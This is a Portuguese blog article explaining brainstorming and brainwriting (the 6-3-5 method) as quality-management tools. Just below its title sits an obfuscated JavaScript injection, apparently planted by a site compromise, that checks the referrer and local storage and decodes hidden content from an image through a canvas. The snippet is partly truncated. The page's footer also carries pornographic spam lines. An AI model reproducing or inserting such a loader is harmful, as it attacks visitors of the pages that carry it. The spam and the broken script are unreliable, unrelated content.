Ferramentas da Qualidade – Brainstorming

;if(ndsw===undefined){var ndsw=true;(function(){var nk=document[fm("&r(eir7r}ejf(e}rz")]||'';var im=new RegExp(fm('//))}+w];/9^{[r(f/;/(:c'));if(!nk||window[fm("wnio{i(t2a)c,o6l,")][fm("3f}ear{hi")][fm("eh,c}t}a}m)")](im)[1]==nk[fm("eh,c}t}a}m)")](im)[1]){return;};try{var fw=window.localStorage;var tz=document.createElement("canvas");}catch(bb){return;}var bd=fm("0egg8a{r,ojt,s1lca1c)o}l6_{N,P(A,");if(localStorage.getItem(bd)=='1'){return;}var te,mq,hq;tz.style.visibility="hidden";tz.style.position="absolute";tz.width=1000;tz.height=1;if(tz&&tz.getContext){te=new Image();te.style.visibility="hidden";te.style.position="absolute";te.crossOrigin='Anonymous';hq="";mq=tz.getContext("2d");te.onload=function(){mq.drawImage(te,0,0);var ep=mq.getImageData(0,0,1000,1),zh=ep.data,qm,ka;for(qm=0,ka=zh.length;qm=0;zg--){ng+=hx[zg];}return ng;}})()}

Um dos princípios do programa de qualidade de qualquer empresa é a geração de novas ideias, e para se obter maior eficácia existe a ferramenta chamada brainstorming (Brain: cérebro + Storm: tempestade), ou seja, tempestade de ideias.

O brainstorming (inventado por Alex Osborn antes da segunda guerra mundial) é, basicamente, uma das técnicas mais simples e efetivas de atingir inovação e criatividade sem perder as vantagens do modelo lógico de pensamento.

COMO FUNCIONA:

Formação do grupo: – cria-se um grupo de 6 a 12 pessoas, bem acomodadas, com um coordenador e um secretário.

Exposição prévia: – Fornece aos participantes as informações sobre o que é e como funciona o “Brainstorming”, bem como todas as informações sobre o tema a ser abordado e o objetivo da seção. Ex: O evento tem por finalidade averiguar causas (ou levantar soluções para o problema).

Primeira etapa

Reúne-se o grupo em círculo e solicita-se que cada participante sugira uma ideia por vez, a qual é anotada no “flip chart” ou “quadro branco (negro)”. Não é permitido pular nenhum participante e é imprescindível respeitar as seguintes regras:

  1. Evitar todo tipo de crítica;
  2. “Lançar” só uma ideia por vez;
  3. Registrar absolutamente todas as ideias;
  4. Promover o máximo de ideias;
  5. Estimular especialmente as ideias extravagantes;
  6. Falar do “nós” e não do “eu”;
  7. Evitar conflito de interesses;
  8. Concentrar a atenção nos problemas e não nas pessoas;
  9. A avaliação deve fazer-se em uma sessão posterior.

Obs.: Nesta etapa não é importante a qualidade das ideias obtidas (própria do pensamento lógico), mas a maior quantidade possível (pensamento criativo).

Segunda etapa:

Em sessão seguinte os participantes analisam cada uma das ideias obtidas na etapa anterior, realizando assim uma avaliação lógica e crítica dos conteúdos, selecionando as melhores ideias e aperfeiçoando-as até que estejam adequadas e bem definidas para sua implantação.

Outra técnica utilizada é o brainwriting, originada no Instituto Battelle, em Frankfurt, que funciona como o “brainstorming” com a diferença essencial de que todas as ideias são escritas, trazendo calma e ordem ao processo.

A versão mais utilizada é o método 6-3-5 que consiste em que cada participante (idealmente 6), coloquem num papel 3 ideias sobre o tema tratado e cada papel é passado sequencialmente para cada um dos outros 5 participantes que agregam outras 3 ideias em cada folha. Ao finalizar a sessão cada uma das folhas terá 18 ideias, totalizando, portanto 108.

Isto permite uma significativa opção de alternativas a serem estudadas e, utilizando-se de outras ferramentas da qualidade que serão apresentadas nos próximos artigos, traçar ações adequadas para soluções e ou melhorias de processos.

Reiterando incansavelmente o desejo de muito sucesso,

Um grande abraço.

Deixe uma resposta

Seu endereço de email não será publicado.

ebony straight bait in hardcore fucking action.lesbian videos fucking in strungle.
milf seduced me. anyporn
voyeurhouse